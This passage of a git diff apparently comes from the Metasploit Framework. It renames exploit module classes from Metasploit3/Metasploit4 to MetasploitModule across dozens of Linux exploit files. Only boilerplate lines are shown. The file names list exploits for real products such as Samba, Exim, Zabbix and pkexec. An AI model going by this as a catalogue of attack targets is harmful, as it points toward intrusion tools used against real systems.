b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb index 0d9432b712..24e3053e41 100644 --- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb +++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb index f645a359fc..01a99e80ec 100644 --- a/modules/exploits/linux/http/vcms_upload.rb +++ b/modules/exploits/linux/http/vcms_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 3411f73fc1..e75ce9a283 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index af414339ba..0ca6edf548 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index aaa3c51f36..1d7bbbe1a9 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/zabbix_sqli.rb b/modules/exploits/linux/http/zabbix_sqli.rb index 782c427555..ac08535943 100644 --- a/modules/exploits/linux/http/zabbix_sqli.rb +++ b/modules/exploits/linux/http/zabbix_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 1097a5e7bf..d388ce25d8 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 3a728421f4..e92284d97c 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb index 834763a5ad..02b241e7f3 100644 --- a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb +++ b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index 33c4fe64af..219b4303e0 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index a8eb39a855..e540d03efe 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Brute diff --git a/modules/exploits/linux/local/desktop_privilege_escalation.rb b/modules/exploits/linux/local/desktop_privilege_escalation.rb index f325ba29ea..6ece63523c 100644 --- a/modules/exploits/linux/local/desktop_privilege_escalation.rb +++ b/modules/exploits/linux/local/desktop_privilege_escalation.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/exe' require 'base64' require 'metasm' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/hp_smhstart.rb b/modules/exploits/linux/local/hp_smhstart.rb index b6a739210f..2a1659297a 100644 --- a/modules/exploits/linux/local/hp_smhstart.rb +++ b/modules/exploits/linux/local/hp_smhstart.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/kloxo_lxsuexec.rb b/modules/exploits/linux/local/kloxo_lxsuexec.rb index b9f5606758..94c13c69c8 100644 --- a/modules/exploits/linux/local/kloxo_lxsuexec.rb +++ b/modules/exploits/linux/local/kloxo_lxsuexec.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/pkexec.rb b/modules/exploits/linux/local/pkexec.rb index a4985734e7..fef8cf0a34 100644 --- a/modules/exploits/linux/local/pkexec.rb +++ b/modules/exploits/linux/local/pkexec.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb index 9c9fb6bbe7..b55bc4d413 100644 --- a/modules/exploits/linux/local/sock_sendpage.rb +++ b/modules/exploits/linux/local/sock_sendpage.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb index 655f0c719e..c08cb2c8d7 100644 --- a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb +++ b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/udev_netlink.rb b/modules/exploits/linux/local/udev_netlink.rb index e9830d13ba..7e5a5432ae 100644 --- a/modules/exploits/linux/local/udev_netlink.rb +++ b/modules/exploits/linux/local/udev_netlink.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index 93cb8106d5..66cffb1370 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File diff --git a/modules/exploits/linux/local/zpanel_zsudo.rb b/modules/exploits/linux/local/zpanel_zsudo.rb index 7a00c6d689..4a04be62c5 100644 --- a/modules/exploits/linux/local/zpanel_zsudo.rb +++ b/modules/exploits/linux/local/zpanel_zsudo.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb index d60f8cd99d..85c416e432 100644 --- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb +++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'openssl' require 'rexml/element' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index f1e7fa938d..fded503b2e 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'drb/drb' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking def initialize(info = {}) diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index d0fe8ca222..96b42453d6 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -7,7 +7,7 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote + class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb index 5ff60004ac..22da78f4b0 100644 --- a/modules/exploits/linux/misc/hikvision_rtsp_bof.rb +++ b/modules/exploits/linux/misc/hikvision_rtsp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb index a41272c31f..bcd21a3f2d 100644 --- a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb +++ b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb index c48287ca88..e5713e21a6 100644 --- a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb +++ b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/misc/hp_vsa_login_bof.rb b/modules/exploits/linux/misc/hp_vsa_login_bof.rb index 6798e4ff53..9c698a5f23 100644 --- a/modules/exploits/linux/misc/hp_vsa_login_bof.rb +++ b/modules/exploits/linux/misc/hp_vsa_login_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hplip_hpssd_exec.rb b/modules/exploits/linux/misc/hplip_hpssd_exec.rb index 35658aaeda..2c591b6186 100644 --- a/modules/exploits/linux/misc/hplip_hpssd_exec.rb +++ b/modules/exploits/linux/misc/hplip_hpssd_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_inet_connect.rb b/modules/exploits/linux/misc/ib_inet_connect.rb index b03053e9be..6804678d9c 100644 --- a/modules/exploits/linux/misc/ib_inet_connect.rb +++ b/modules/exploits/linux/misc/ib_inet_connect.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_jrd8_create_database.rb b/modules/exploits/linux/misc/ib_jrd8_create_database.rb index f29e9e831b..abaa69dc85 100644 --- a/modules/exploits/linux/misc/ib_jrd8_create_database.rb +++ b/modules/exploits/linux/misc/ib_jrd8_create_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_open_marker_file.rb b/modules/exploits/linux/misc/ib_open_marker_file.rb index 745eebb2f2..68002ee8b1 100644 --- a/modules/exploits/linux/misc/ib_open_marker_file.rb +++ b/modules/exploits/linux/misc/ib_open_marker_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb index 0c38798c19..6ea756791d 100644 --- a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb +++ b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index a715ed69ab..54ac018b40 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/lprng_format_string.rb b/modules/exploits/linux/misc/lprng_format_string.rb index ea1f0cd5df..f40fecdcba 100644 --- a/modules/exploits/linux/misc/lprng_format_string.rb +++ b/modules/exploits/linux/misc/lprng_format_string.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/mongod_native_helper.rb b/modules/exploits/linux/misc/mongod_native_helper.rb index ff457795de..331e842c2f 100644 --- a/modules/exploits/linux/misc/mongod_native_helper.rb +++ b/modules/exploits/linux/misc/mongod_native_helper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb index 2048a5c6fc..3ac5320c90 100644 --- a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb +++ b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/netsupport_manager_agent.rb b/modules/exploits/linux/misc/netsupport_manager_agent.rb index 1ab5730b3b..abfa4247a6 100644 --- a/modules/exploits/linux/misc/netsupport_manager_agent.rb +++ b/modules/exploits/linux/misc/netsupport_manager_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index 479740e771..3b1ea17ab1 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/sercomm_exec.rb b/modules/exploits/linux/misc/sercomm_exec.rb index 39e294bd2b..ed0637d842 100644 --- a/modules/exploits/linux/misc/sercomm_exec.rb +++ b/modules/exploits/linux/misc/sercomm_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 2376559d8d..0826b3cb16 100644 --- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index 4df096710f..61ad7081f3 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index bd086efcc5..9b6811b040 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb index e4a4c225b8..b3e42f2ac6 100644 --- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb +++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb index 0194930466..6f781a8e47 100644 --- a/modules/exploits/linux/postgres/postgres_payload.rb +++ b/modules/exploits/linux/postgres/postgres_payload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/postgres' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index 59fc651054..1960848adf 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index bf98f0278a..5552ff0bbc 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Brute diff --git a/modules/exploits/linux/samba/chain_reply.rb b/modules/exploits/linux/samba/chain_reply.rb index ae73ad1779..5f6e867f48 100644 --- a/modules/exploits/linux/samba/chain_reply.rb +++ b/modules/exploits/linux/samba/chain_reply.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index ed72293621..5a9c5dfb6a 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/linux/samba/setinfopolicy_heap.rb b/modules/exploits/linux/samba/setinfopolicy_heap.rb index b5bbdc6329..8dd9476745 100644 --- a/modules/exploits/linux/samba/setinfopolicy_heap.rb +++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb index 63f0fdc1a8..e89a00faea 100644 --- a/modules/exploits/linux/samba/trans2open.rb +++ b/modules/exploits/linux/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb index 2823d626f0..2759efc69c 100644 --- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb +++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb index cbfa6a463a..79540ed980 100644 --- a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb +++ b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index 4d77912786..9e343f2aab 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Auxiliary::Report Rank = ExcellentRanking diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 7a460a0ac6..db95be34b6 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index 3a33e74fb0..8ef37218b9 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 3a68d2f957..7693de503a 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking def initialize(info = {}) diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index 83e5191308..e92c624a4f 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 4885234c97..5f107ea05f 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb index 1665ae8b2d..a5f7d68121 100644 --- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Telnet diff --git a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb index d65f048c33..d806264e2c 100644 --- a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb +++ b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb index fe94b76a68..77161f34cc 100644 --- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb +++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb index 